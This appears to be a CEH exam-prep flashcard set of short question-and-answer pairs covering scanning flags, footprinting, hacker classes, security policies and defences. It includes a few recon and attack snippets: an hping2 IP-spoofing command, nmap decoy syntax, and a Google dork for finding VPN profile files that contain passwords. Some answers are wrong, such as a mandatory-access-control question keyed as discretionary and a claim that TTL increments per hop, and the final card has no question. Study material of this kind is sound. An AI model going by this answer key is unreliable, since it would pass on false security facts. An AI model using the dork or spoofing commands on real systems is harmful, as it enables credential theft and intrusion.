How does the tool SNOW facilitate the use of steganography? A)Hides files with folders B)Hides message with whitespace C)Hides messages in graphics D)Hides messages in carrier files
16 bits long
How long is the field for port numbers?
Disable LLMNR Disable NBT-NS
How to Defend against LLMNR/NBT-NS Poisoning
1) To delete NTFS streams, move the suspected files to a FAT partition 2) Use a third-party file integrity checker such as Tripwire File Integrity Monitoring to maintain the integrity of files on an NTFS partition 3) Use programs such as Stream Detector, LADS, ADS Detector, etc. to detect streams 4) Enable real-time antivirus scanning to protect against execution of malicious streams on your system 5) Use up-to-date antivirus software on your system
How to Defend against NTFS Streams
1) Reinstall OS/applications from a trusted source after backing up the critical data 2) Well-documented automated installation procedures need to be kept 3) Perform kernel memory dump analysis to determine the presence of rootkits 4) Harden the workstation or server against the attack 5) Educate staff not to download any files/programs from untrusted sources 6) Install network and host-based firewalls 7) Ensure the availability of trusted restoration media 8) Update and patch operating systems and applications 9) Verify the integrity of system files regularly using cryptographically strong digital fingerprint technologies 10) Update antivirus and anti-spyware software regularly 11) Avoid logging in to an account with administrative privileges 12) Adhere to the least privilege principle 13) Ensure the chosen antivirus software possesses rootkit protection 14) Do not install unnecessary applications and also disable the features and services not in use
How to defend against Rootkits
-Q --seqnum
Hping option used in order to collect sequence numbers generated by the target host
-2
Hping sets UDP mode
-9
Hping sets in listen mode, to trigger on a signature argument when it sees it come through.
-8
Hping sets scan mode, expecting an argument for the ports to be scanned (single, range 1-1000)
-A
Hping sets the ACK flag
-F
Hping sets the FIN flag
-P
Hping sets the PSH flag
-R
Hping sets the RST flag
-X
Hping sets the XMAS scan flags.
--flood
Hping will send packets as fast as possible, without taking care to show incoming replies.
Habits
Human beings tend to follow set patterns and behaviors known as ____.
Email Security Policy
It is created to govern the proper usage of corporate email
Direct TTL Probes IP Identification Number TCP Flow Control Method
IP Spoofing Detection Techniques
was Internet Assigned Numbers Authority (IANA) now Internet Corporation for Assigned Names and Numbers (ICANN)
IP address management is done through what?
Layer 3 Network
IP resides at what layer of the OSI model?
hping2 www.certifiedhacker.com -a 7.7.7.7
IP spoofing using Hping2
127.0.0.1
IPv4 loop back address
32 bits 128 bits
IPv6 increases the IP address size from __ to __, to support more levels of addressing hierarchy
UDP 500
ISAKMP/Internet Key Exchange (IKE)
NIDS and HIDS
If a ping sweep is not done properly or too fast, what systems can detect it?
inject a malicious dylib
If attackers can ___ in one of the primary directories, it will be executed in place of the original dylib
stateful firewall
If doing an ACK flag probe and there is no response, this indicates a ____ is between the attacker and the host.
higher
If the SN (Serial Number) is ___ than that of the secondary, it's time to update.
port is open
If the TTL value of the RST packet on a particular port is less than the boundary value of 64, then that ___
Port is closed
If the TTL value of the RST packet on a particular port is more than the boundary value of 64, then that ___
is open
If the WINDOW value of the RST packet on a particular port has a non-zero value, then that port __
replace the target binary
If the file system permissions of binaries are not properly set, an attacker can ___ with a malicious file
replace redundant bits of image
Image steganography tools ___ data with the message in such a way that the effect cannot be detected by human eyes
D)Encrypting the data exchanged
In a hybrid PKI model, which function is performed by the symmetric algorithm? A)Encrypting the symmetric key exchanged B)Authenticating the remote device C)Exchanging the keys D)Encrypting the data exchanged
Logical safeguards
In a risk assessment, event logging and password management are examples of which type of safeguard?
Physical safeguards
In a risk assessment, facility access control and equipment inventory are examples of which type of safeguard?
B. Visit www.archive.org and see whether the old copy is available
In gathering information about a potential target, you carry out a social engineering attack against employees. In eavesdropping, you overhear an employee conversation about a sensitive document that was inadvertently posted to the company website and remained on the site for a few days but was later removed. In checking the website, you find the document has indeed been removed. What is a possible solution to finding the document? A. Install Black Widow and copy the website to your machine; the page may simply be hidden B. Visit www.archive.org and see whether the old copy is available C. Attempt a SQL injection attack against the site D. None of the above. It is impossible to recover
B. The attacker is attempting a password crack D. The attacker is attempting to launch a command line shell
In the output of a network IDS capture you notice a large number of 0x90 values, with "/bin/sh" also appearing in the ASCII part of the output. Which of the following are the most accurate assumptions based on these observations? (Choose Two) A. The attacker is attempting a buffer overflow B. The attacker is attempting a password crack C. The attacker is attempting a session hijack D. The attacker is attempting to launch a command line shell
XML denial of service
In what type of attack does the attacker craft an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or with malicious DTDs (Data Type Documents)?
Cover tracks
In which CEH system hacking stage do you clear the security log?
Escalate privileges
In which CEH system hacking stage do you dump the SAM file?
Executing applications
In which CEH system hacking stage do you execute the payload?
Cracking passwords
In which CEH system hacking stage do you use Brutus?
D. Parameter Manipulation
In which attack would a hacker modify the URL in the web browser's address field to attempt to gain access to resources they're not supposed to be able to view? A. SQL injection B. XSS C. Brute Force D. Parameter Manipulation
Conclusion
In which phase of Software Assurance Maturity Model do you advise corrective action?
Preparation
In which phase of Software Assurance Maturity Model do you execute a formal contract that guarantees non-disclosure of the client's data and legal protection for the tester?
Conduct
In which phase of Software Assurance Maturity Model does the tester look for potential vulnerabilities?
Maintaining Access
In which phase of an attack are rootkits installed and unpatched systems taken advantage of?
Gaining Access
In which phase of an attack are the systems breached, malicious code planted, and backdoors opened?
B. Scanning and enumeration
In which phase of the ethical hacking methodology would a hacker be expected to discover available targets on a network? A. Reconnaissance B. Scanning and enumeration C. Gaining access D. Maintaining access E. Covering tracks
B. Scanning and enumeration
In which stage of an ethical hack would the attacker actively apply tools and techniques to gather more in-depth information on the targets? A. Active reconnaissance B. Scanning and enumeration C. Gaining access D. Passive reconnaissance
Construction stage
In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries built?
Design phase
In which stage of the Secure Software Development Lifecycle is the platform and programming language chosen?
E)Cracking passwords
In which step of the CEH Hacking Methodology (CHM) do you recover the credentials for a system account? A)Covering tracks B)Hiding files C)Executing applications D)Penetration testing E)Cracking passwords F)Escalating privileges
TechSpy EmpSpy
InSpy has two functionalities: __: Crawls LinkedIn job listings for technologies used by the target company __: Crawls LinkedIn for employees working at the provided company
White Hats
Individuals professing hacker skills and using them for defensive purposes and are also known as security analysts
Suicide Hackers
Individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment
Hacktivist
Individuals who promote a political agenda by hacking, especially by defacing or disabling websites
Gray Hats
Individuals who work both offensively and defensively at various times
Black Hats
Individuals with extraordinary computing skills, resorting to malicious or destructive activities and are also known as crackers
GiliSoft File Lock Pro
It locks files, folders, and drives; hides files, folders, and drives to make them invisible; or password-protects files, folders, and drives
(Inverse TCP flag) No response RST/ACK
Inverse TCP flag, if the port is open there will be ____, if the port is closed, a ____ will be sent in response.
Evaluation Assurance Level (EAL)
It provided a way for vendors to make claims about their in-place security by following a set standard of controls and testing methods. Levels 1-7
Password Policy
It provides guidelines for using strong password protection on an organization's resources
Botnet
Is a huge network of compromised systems used by an intruder to perform various network attacks
Defense in Depth
Is a security strategy in which several protection layers are placed throughout an information system
Incident Management
Is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore normal service operations as quickly as possible and prevent future recurrence of the incident
Enterprise Information Security Architecture (EISA)
Is a set of requirements, processes, principles, and models that determines the structure and behavior of an organization's information systems
Competitive Intelligence Gathering
Is the process of identifying, gathering, analyzing, verifying, and using information about your competitors from resources such as the Internet
Identify Vulnerabilities
It allows an attacker to identify vulnerabilities in the target systems in order to select appropriate exploits
Draw Network Map
It allows attackers to draw a map or outline of the target organization's network infrastructure in order to know the actual environment they are going to break into
decoys as well as the host(s)
It appears to the target that the ___ are scanning the network when using the IP address decoy technique
Firewall-Management Policy
It defines access, management, and monitoring of firewalls in the organization
Acceptable-Use Policy
It defines the acceptable use of system resources
User-Account Policy
It defines the account creation process, and authority, rights and responsibilities of user accounts
Access Control Policy
It defines the resources being protected and the rules that control access to them
Information-Protection Policy
It defines the sensitivity levels of information, who may have access, how it is stored and transmitted, and how it should be deleted from storage media
Remote-Access Policy
It defines who can have remote access, and defines access medium and remote access security controls
Network-Connection Policy
It defines who can install new resources on the network, approve the installation of new devices, document network changes, etc.
Paranoid Policy
It forbids everything: no Internet connection, or severely limited Internet usage
Daisy Chaining
It involves gaining access to one network and/or computer and then using the same information to gain access to multiple networks and computers that contain desirable information
Physical Security
It involves protection of organizational assets from environmental and man-made threats
Insider Attack
It is an attack performed on a corporate network or on a single computer by an entrusted person who has authorized access to the network
Log what has occurred, consult the security policy, and act accordingly
Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation? A)Log what has occurred and immediately call the incident response team B)Log what has occurred, consult the security policy, and act accordingly C)Log what has occurred and continue normal administrative duties D)Log what has occurred and wait for further evidence of an attack
A. DNS poisoning
Joe accesses the company website, www.anybusi.com, from his home computer and is presented with a defaced site containing disturbing images. He calls the IT department to report the website hack and is told they do not see any problem with the site--no files have been changed, and when accessed from their terminals (inside the company), the site appears normally. Joe connects over VPN into the company website and notices the site appears normally. Which of the following might explain the issue? A. DNS poisoning B. Route poisoning C. SQL injection D. ARP poisoning
B. Suicide hacker
Joe is a security engineer for a firm. His company downsizes, and Joe discovers he will be laid off within a short amount of time. Joe plants viruses and sets about destroying data and settings throughout the network, with no regard to being caught. Which type of hacker is Joe considered to be? A. Hacktivist B. Suicide hacker C. Black hat D. Script kiddie
C)Insider affiliate
Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present? A)Pure insider B)Insider associate C)Insider affiliate D)Outside affiliate
name resolution
LLMNR and NBT-NS are two main elements of Windows operating systems used to perform ___ for hosts present on the same link
Responder Metasploit NBNSpoof Inveigh
LLMNR/NBT-NS Spoofing Tools
Presentation
Layer 6 of OSI model
Banner grabbing from page extensions
Looking for an extension in the URL may assist in determining the application version Example: .aspx => IIS server and Windows platform
C. The username and password fields stored in the table named users will be displayed
Log files from an attack reveal the following entry SELECT username, password FROM users; Which of the following best describes the result of this command query? A. The username and password fields will be deleted from a table named users B. A username field and a password field will be added to a table named users C. The username and password fields stored in the table named users will be displayed D. The command will not produce any results
!Host=*.* intext:enc_UserPassword=* ext:pcf
Look for .pcf files, which contain user VPN profiles
allowing remote access
Necurs contains backdoor functionality, ___ and control of the infected computer
C)Public-key encryption and digital signatures
Management decides to implement a public key infrastructure (PKI) on the network. Which services will it provide? A)Private-key encryption and digital signatures B)Hashing and digital signatures C)Public-key encryption and digital signatures D)Public-key encryption and hashing
contingency plan
Management policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.
nmap -D decoy1,decoy2,decoy3,...
Manually specify the IP addresses of the decoys using Nmap
Health Insurance Portability and Accountability Act (HIPAA)
Many medical facilities need to maintain compliance with the ___.
Google Earth Google Maps Bing Maps
Mapping and location-specific information, including drive-by pictures of the company exterior and overhead shots can be found where?
Spytech SpyAgent Power Spy
Name a couple of spyware programs
Horse Pill GrayFish Sirefef Necurs
Name four Rootkits
logical or physical path
Network diagram shows ____ to a potential target
D. A parallel, fast ACK scan of a Class C subnet
Nmap is a powerful scanning and enumeration tool. What does the following nmap command attempt to accomplish? nmap -sA -T4 192.168.15.0/24 A. A serial, slow operating system discovery scan of a Class C subnet B. A parallel, fast operating system discovery scan of a Class C subnet C. A serial, slow ACK scan of a Class C subnet D. A parallel, fast ACK scan of a Class C subnet
- To discover live hosts, IP addresses, and open ports of live hosts - To discover operating systems and system architecture - To discover services running on hosts - To discover vulnerabilities in live hosts
Objectives of Network Scanning
Access creep
Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.
rwho
On Unix/Linux, displays a list of users who are logged in to hosts on the local network
rusers
On Unix/Linux, displays a list of users who are logged on to remote machines or machines on the local network
finger
On Unix/Linux, displays information about system users such as a user's login name, real name, terminal name, idle time, login time, office location, and office phone number
arp -a
On a Windows machine what is the command to display your current ARP cache?
Collision domain
On a switch, each switchport represents a ____.
A)Something you have
On your advice, your company will implement a new access control mechanism for the data center. Users must provide the following evidence for authentication: username/password credentials, a smart card swipe, and a fingerprint scan. Once in the data center, the terminal from which they access is logged and verified against a list of allowable machines. You need to justify the additional expense for the multi-factor authentication process to management. Which authentication factor does the smart card satisfy? A)Something you have B)Somewhere you are C)Something you are D)Something you know
nbtstat
On your own machine, which command brings up a host of switches to use for information-gathering purposes over NetBIOS?
A)Current operating system
One of your ethical hackers logs into several computers using Telnet and grabs the banner on these computers. What information is the ethical hacker able to discover? A)Current operating system B)Running applications C)Currently logged-in user D)Open ports
B. Passive OS fingerprinting
One of your team members is analyzing TTL fields and TCP window sizes in order to fingerprint the OS of a target. Which of the following is most likely being attempted? A. Online OS fingerprinting B. Passive OS fingerprinting C. Aggressive OS fingerprinting D. Active OS fingerprinting
maintain persistence escalate privileges
Path interception helps an attacker to ___ on a system and ___
NS
Points to the host's name server
Permissive Policy
Policy begins wide open and only known dangerous services/attacks or behaviors are blocked. It should be updated regularly to be effective
POP3 (TCP)
Port number 110
SSH (TCP)
Port number 22
Telnet (TCP)
Port number 23
LDAP (TCP, UDP)
Port number 389
Port is open (Inverse TCP Flag Scanning)
Probe Packet (FIN/URG/PSH/NULL) --> <-- No Response
C)Impersonation
Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred? A)Dumpster diving B)Piggybacking C)Impersonation D)Eavesdropping
A)Detective
Requiring an audit trail in the security policy is an example of implementing which type of control? A)Detective B)Compensatory C)Preventative D)Corrective
[inurl:]
Restricts the results to documents containing the search keyword in the URL
[allintitle:]
Restricts the results to those websites with all of the search keywords in the title
Serial number
Revision number of the zone file. This number increments each time the zone file changes and is used by a secondary server to know when to update its copy.
A SID with a RID of 500 for an administrator
S-1-5-21-3874928736-367528774-1298337465-500
C) SNMPv3
SNMP provides great network management resource potential but also produces some significant security vulnerabilities. Which SNMP version provides encryption and authentication measures? A) SNMPv1 B) SNMPv2 C) SNMPv3 D) B and C E) None of the above
is the process of discovering systems on the network and taking a look at what open ports and applications may be running
Scanning
Credit card details and social security number User names and passwords Security products in use Operating systems and software versions Network layout information IP addresses and names of servers
Social engineers attempt to gather:
personal and organizational information
Social networking sites are a great source of ______
F) UDP 514
Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use to you. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 110 C) TCP 161 D) UDP 161 E) TCP 514 F) UDP 514
port 23
Telnet runs on _____.
wireless wired
The AP is connected to both the ___ LAN and the ___ LAN, providing wireless clients access to network resources.
TTL
The ___ on each packet increments by one after each hop is hit and returns.
assessment or security evaluation
The ___ phase is when the actual assaults on the security controls are conducted.
D. Attempt banner grabbing.
The following results are from an nmap scan: Starting nmap V. 3.10A ( www.insecure.org/nmap/ ) Interesting ports on 192.168.15.12: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 263.46 seconds Which of the following is the best option to assist in identifying the operating system? A. Attempt an ACK scan. B. Traceroute to the system. C. Run the same nmap scan with the -vv options. D. Attempt banner grabbing.
"SYN/ACK" (Session request acknowledgment) "RST" (Reset)
The target machine will send back a ___ packet if the port is open, and an ___ packet if the port is closed
Integrity
The trustworthiness of data or resources in terms of preventing improper and unauthorized changes
C)CSRF
The use of random tokens by a web application could help prevent which type of attack? A)XSS B)SQL injection C)CSRF D)SYN flood
A)Type 3/Code 13
You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP? A)Type 3/Code 13 B)Type 3/Code 6 C)Type 13 D)Type 0
A. >
There are certain characters that cannot be used within text in HTML because these characters confuse the browser. In these instances, an HTML entity can be used to represent the character. Which HTML entity corresponds to the greater-than > character? A. > B. < C. ) D. (
Misconfiguration attacks
These attacks take advantage of systems that are, on purpose or by accident, not configured appropriately for security.
Information Audit Policy
This defines the framework for auditing security within the organization. When, where, how often, and sometimes even who conducts it are described here.
Information Security Policy
This identifies to employees what company systems may be used for, what they cannot be used for, and what the consequences are for breaking the rules. Generally employees are required to sign a copy before accessing resources. Versions of this policy are also known as an Acceptable Use Policy.
MX (Mail Exchange)
This record identifies your e-mail servers within your domain.
Inverse TCP flag (also called FIN scan or NULL scan)
This scan uses the FIN, URG, or PSH flag (or, in one version, no flags at all) to poke at system ports.
Spectre Meltdown Access Token Manipulation Application Shimming File System Permissions Weakness Path Interception Scheduled Task Launch Daemon Plist Modification Setuid and Setgid Web Shell
What are some Privilege Escalation Techniques
B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23
To search for all Telnet packets from 212.77.66.55, which Wireshark expression should be in place? (Choose all that apply) A) ip.src==212.77.66.55 and tcp.srcport==21 B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23 D) ip.src==212.77.66.55 && tcp.srcport==21
Nbtstat SuperScan Hyena Winfingerprint NetBIOS Enumerator NSAuditor
Tools for NetBIOS enumeration:
GetNotify Contact-Monkey Yesware Read Notify WhoReadMe MSGTAG Trace Email Zendio
Tools for email tracking as part of footprinting:
RemoteExec PDQ Deploy Dameware Remote Support ManageEngine Desktop Central PsExec TheFatRat
Tools for executing applications
Rankur Google Alerts Social Mention WhosTalkin ReputationDefender PR Software Naymz BrandsEye Brandyourself Talkwalker
Tools for tracking the online reputation of the target.
Proxy Switcher Proxy Workbench ProxyChains SoftCab's Proxy Chain Builder CyberGhost Proxifier
Tools used to set up proxy chains, where multiple proxies further hide your activities.
Cloud Computing Threats Advanced Persistent Threats Viruses and Worms Mobile Threats Botnet Insider Attack
Top 6 Information Security Attack Vectors
Path Analyzer Pro VisualRoute Network Pinger Magic NetTrace GEOSpider 3D Traceroute vTrace AnalogX HyperTrace Trout Network Systems Traceroute Roadkil's Trace Route Ping Plotter
Traceroute Tools
PathAnalyzer Pro VisualRoute GEO Spider Trout Magic NetTrace Ping Plotter Traceroute Tool
Traceroute Tools
ICMP protocol TTL field
Traceroute programs work on the concept of ____ and use the ____ in the header of ICMP packets to discover the routers on the path to a target host.
D. Nessus
Tracy is managing a web server and wants to search for vulnerabilities. What tool would be a good choice for her to start with? A. Black Widow B. Httrack C. BurpSuite D. Nessus
computationally less feasible
Traditional network scanning techniques will be ___ due to the larger search space (64 bits of host address space, or 2^64 addresses) provided by IPv6 in a subnet
target's customer base
Traffic monitoring helps to collect information about the ____, which helps attackers disguise themselves as customers and launch social engineering attacks on the target
D. The ethical hacker always obtains written permission before testing.
Two hackers attempt to crack a company's network resource security. One is considered an ethical hacker, whereas the other is not. What distinguishes the ethical hacker from the "cracker"? A. The cracker always attempts white-box testing. B. The ethical hacker always attempts black-box testing. C. The cracker posts results to the Internet. D. The ethical hacker always obtains written permission before testing.
Passive Reconnaissance Active Reconnaissance
Two types of Reconnaissance
Operating System Attacks Mis-configuration Attacks Application Level Attacks Shrink-Wrap Code Attacks
Types of Attacks on a System
find specific computers (routers, servers, etc)
Use SHODAN search engine that lets you ____ using a variety of filters.
pdf documents Microsoft Word files
Useful information may reside on the target organization's website in the form of ____
Connection status and content-type Accept-Ranges Last-Modified information X-Powered-By information Web server in use and its version
Using Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebug, etc. to view headers provides what kind of information?
metadata extraction network analysis fingerprinting
Using FOCA, it is possible to undertake multiple attacks and analysis techniques such as ____, ____, DNS snooping, proxies search, ____, open directories search, etc.
normal traffic
Using Reverse HTTP Shells: This type of traffic is considered ___ by an organization's network perimeter security such as the DMZ, firewall, etc.
netstat -b
Using netstat, typing ___ lets you see the executable tied to the open port.
netstat -an
Using netstat, typing ____ displays all connections and listening ports, with addresses and port numbers in numerical form.
B)87698415
Using tcpdump, you acquire the TCP handshake and capture several packets sent between two devices in your network. The last packet you capture contains the following values: Seq no. 26556942 (next seq no. 26557263), Ack no. 87698415, Window 8700, LEN = 1656 bytes of data. Based on this information, which sequence number will be used in the reply to this packet? A)26556942 B)87698415 C)87698416 D)26557263
Management Network Zone
Usually an area you'd find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
A. MX
While footprinting a network, you successfully perform a zone transfer. Which DNS record in the zone transfer indicates the company's e-mail server? A. MX B. EM C. SOA D. PTR
Buffer overflow DoS attacks
Vulnerabilities in UPnP may allow attackers to launch ____ or ___
Nessus GFI LanGuard Qualys FreeScan Retina CS OpenVAS Core Impact Professional Security Manager Plus MBSA Nexpose Shadow Security Scanner SAINT Nsauditor Network Security Auditor Security Auditor's Research Assistant (SARA)
Vulnerability Scanners
Retina CS for Mobile SecurityMetrics MobileScan Nessus Vulnerability Scanner
Vulnerability Scanning Tools for Mobile
-Selectively creates custom vulnerability checks -Identifies security vulnerabilities and takes remedial action -Creates different types of scans and vulnerability tests -Helps ensure third-party security applications offer optimum protection -Performs network device vulnerability checks
What are features of GFI LanGuard?
AnyWho PeopleSmart US Search Veromi Intelius PrivateEye 411 People Search Now PeopleFinders Public Background Checks
What are some People Search Online Services?
1) Install and maintain firewall configuration to protect data. 2) Remove vendor-supplied default passwords and other default security features. 3) Protect stored data. 4) Encrypt transmission of cardholder data. 5) Install, use, and update AV (antivirus). 6) Develop secure systems and applications. 7) Use "need to know" as a guideline to restrict access to data. 8) Assign a unique ID to each stakeholder in the process (with computer access). 9) Restrict any physical access to the data. 10) Monitor all access to data and network resources holding, transmitting, or protecting it. 11) Test security procedures and systems regularly. 12) Create and maintain an information security policy.
What are the 12 requirements for groups and organizations involved in the entirety of the payment process, from card issuers to merchants to those storing and transmitting card information?
1) Preparation for Incident Handling and Response 2) Detection and Analysis 3) Classification and Prioritization 4) Notification 5) Containment 6) Forensic Investigation 7) Eradication and Recovery 8) Post-incident Activities
What are the Eight steps to the Incident Management Process?
Confidentiality Integrity Availability Authenticity Non-Repudiation
What are the Elements of Information Security
1) Perform risk assessment to identify risks to the organization's assets 2) Learn from standard guidelines and other organizations 3) Include senior management and all other staff in policy development 4) Set clear penalties and enforce them 5) Make final version available to all of the staff in the organization 6) Ensure every member of your staff read, sign, and understand the policy 7) Deploy tools to enforce policies 8) Train your employees and educate them about the policy 9) Regularly review and update
What are the Nine steps to Create and Implement Security Policies?
Black Hats White Hats Gray Hats Suicide Hackers Script Kiddies Cyber Terrorists State Sponsored Hackers Hacktivist
What are the eight hacker Classes?
Internet Internet DMZ Production Network Zone Intranet Zone Management Network Zone
What are the five network security zones defined by ECC?
1) Identify Security Objectives 2) Application Overview 3) Decompose Application 4) Identify Threats 5) Identify Vulnerabilities
What are the five parts of Threat Modeling?
American Registry for Internet Numbers (ARIN) Asia-Pacific Network Information Center (APNIC) Reseaux IP Europeens (RIPE) NCC Latin America and Caribbean Network Information Center (LACNIC) African Network Information Center (AfriNIC)
What are the five registrant bodies?
1) Footprinting through search engines 2) Footprinting using advanced google hacking techniques 3) Footprinting through social networking sites 4) Website footprinting 5) Email footprinting 6) Competitive intelligence 7) WHOIS footprinting 8) DNS footprinting 9) Network footprinting 10) Footprinting through social engineering
What are the ten steps of the footprinting methodology?
Network Threats Host Threats Application Threats
What are the three Information Security Threat Categories?
Unicast Multicast Broadcast
What are the three main address types of IPv4?
Collect Network Information Collect System Information Collect Organization's Information
What are the three main objectives of footprinting?
Security Functionality Usability
What are the three parts of the triangle in which, as one increases, the others decrease?
Logical safeguards, Administrative safeguards, and physical safeguards
What are the three safeguards in a risk assessment?
Signature-based and anomaly-based
What are the two detection methods used by IDS systems?
To recover keys in the event the original keys are lost or deleted, and to provide access to data to other third parties, such as law enforcement investigations
What are the two functions of key escrow?
Connectionless communication (UDP) Connection-Oriented Communication (TCP)
What are the two methods of data transfer at the Transport layer?
scalar - defines a single object tabular - defines multiple related objects grouped together in MIB tables
What are the two types of managed objects in SNMP?
TTL Window
What are the two versions of ACK flag probe?
XML filters XML gateways Ensuring a robust XML parser
What are three mitigations to an XML DoS attack?
GSA Email Spider Web Data Extractor
What are two web spider tools?
Rapid replication
What are worms typically known for?
netstat -an
What command is used to listen to open ports with netstat?
Destination unreachable, because it is administratively prohibited (router is blocking ICMP)
What does an ICMP Type 3/Code 13 error message indicate?
Destination unreachable, because the packet requires fragmentation but the Don't Fragment (DF) bit is set
What does an ICMP Type 3/Code 4 error message indicate?
Risk transference
What happens when insurance is used to eliminate a risk?
Source host Contact e-mail Serial number Refresh time Retry time Expire time TTL
What information can be found in the SOA record?
Total visitors Page views Bounce rate Live visitors map Site ranking
What information can be gathered by monitoring website traffic?
A)Blood vessels
What information is measured in a retina scan? A)Blood vessels B)Pupil size C)Colored ridges D)Ocular pressure
Residential address Email addresses Contact numbers Date of birth Photos Social networking profiles Blog URLs Satellite pictures of private residencies Upcoming projects Operating environment
What information is returned from doing a people search about a person or organization?
B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security
Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides? A. Vulnerability measurement and assessments for the U.S. Department of Defense B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security C. Incident response services for all Internet providers D. Pen test registration for public and private sector
C)Filtering network packets
Which of the following can NOT be prevented by the security and privacy settings on a client's web browser? A)Running Java applets B)Cookie storage C)Filtering network packets D)Handling pop-up windows
Input validation
Which of the following can prevent bad input from being presented to an application?
A)Username and password
Which of the following combinations does NOT represent multi-factor authentication? A)Username and password B)Fingerprint scan and password C)USB token and retina scan D)USB token and password
D. lsof
Which of the following commands is the best choice to use on a Linux machine when attempting to list processes and the UIDs associated with them in a reliable manner? A. ls B. chmod C. pwd D. lsof
C) sc query
Which of the following commands lists the running services on a Windows machine? A) netsh services B) netstat -s C) sc query D) wmic bios get services
C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24
Which of the following commands would you use to quickly identify live targets on a subnet? (Choose all that apply.) A. nmap -A 172.17.24.17 B. nmap -O 172.17.24.0/24 C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24
C)SSL
Which of the following connection types can cause a security issue when an IDS is in the path? A)T1 B)ISDN C)SSL D)GRE tunnel
A)Announcement of a security hole in a product
Which of the following constitutes a vulnerability? A)Announcement of a security hole in a product B)Detailed description of how to exploit a product C)Instructions on how to secure a product D)List of best practices to prevent exploitation
A. Use ARPWALL. C. Use private VLANs. D. Use static ARP entries.
Which of the following could provide useful defense against ARP spoofing? (Choose all that apply.) A. Use ARPWALL B. Set all NICs to promiscuous mode. C. Use private VLANs. D. Use static ARP entries.
B. Blue team
Which of the following describes security personnel who act in defense of the network during attack simulations? A. Red team B. Blue team C. Black hats D. White hats
C)Attack profile
Which of the following does NOT occur during risk assessment? A)Vulnerability identification B)Threat identification C)Attack profile D)Control analysis
B)Adherence of a company to its security policy
Which of the following does a security audit evaluate? A)Execution of the security plan B)Adherence of a company to its security policy C)Adherence of the security policy to industry standards D)Security readiness of the organization
C) Discretionary access control
Which of the following ensures that the enforcement of an organizational security policy does not rely on voluntary user compliance and secures information by assigning labels on information and comparing this to the level of security a user is operating at? A) Authorized access control B) Mandatory access control C) Discretionary access control D) Role-based access control
D)Network topology weaknesses F)Application configuration errors
Which of the following information can be gathered by a network vulnerability scanner? (Choose all that apply.) A)Spear phishing email storage B)Sensitive information sent to outside networks C)Local user account credentials D)Network topology weaknesses E)Packets received from malicious sources F)Application configuration errors
A)They are usually expensive to implement.
Which of the following is NOT a drawback to implementing anti-virus systems? A)They are usually expensive to implement. B)They rely upon signature file updates. C)They often provide limited detection techniques. D)They negatively affect the performance of the system on which they reside.
D)Server layer
Which of the following is NOT a layer of the Web application architecture? A)Client layer B)Business logic layer C)Database layer D)Server layer
C)Provides only user behavior measurement and analysis
Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)? A)Provides a large number of false positives B)Requires an attack signature to detect new attack types. C)Provides only user behavior measurement and analysis D)Can be defeated by network tunnels and encryption
B)Copying sensitive data to a USB drive
Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability? A)Exposure of passwords B)Copying sensitive data to a USB drive C)Exposure of sensitive files D)Improper access to databases
C)Syntax of the certificate
Which of the following is NOT accomplished during certificate validation? A)Integrity of the certificate B)Identity of the issuer C)Syntax of the certificate D)Validity of the certificate
A)Faster than the CORBA standard
Which of the following is NOT an advantage to using SOAP? A)Faster than the CORBA standard B)Platform-independent C)Leverages multiple transport protocols D)Simplifies communications
C) TCP-over-dns
Which of the following is a client server tool utilized to evade firewall inspection? A) Kismet B) Wireshark C) TCP-over-dns D) Snow
B)XML denial of service issues
Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways? A)Insecure communications B)XML denial of service issues C)Replay attacks D)Information leakage
A. Audit trail
Which of the following is a detective control? A. Audit trail B. CONOPS C. Procedure D. Smartcard authentication E. Process
B) As a symmetric key algorithm, the keys would need to be sent over a different channel
Which of the following is a potential drawback to using AES to share data? A) It takes a long time to encrypt data, which slows down communication B) As a symmetric key algorithm, the keys would need to be sent over a different channel C) Configuration of AES is complicated and time-consuming to set up D) Performance is greatly affected by massive overhead
C)Tailgating
Which of the following is an attack on physical security? A)SYN flood B)Brute force C)Tailgating D)IP spoofing
B)Static WEP key
Which of the following is an example of a symmetric encryption? A)File hash B)Static WEP key C)Public key D)Private key
C)Wireshark
Which of the following is an open-source packet analyzer that can be used for network troubleshooting and analysis? A)Cain and Abel B)Nessus C)Wireshark D)CUPP
B) Single sign on
Which of the following is defined as a system where users need to remember only one user ID and password combination to be authenticated for multiple resources? A) Simple sign on B) Single sign on C) Digital sign on D) Certificate sign on
A. Mandatory access control
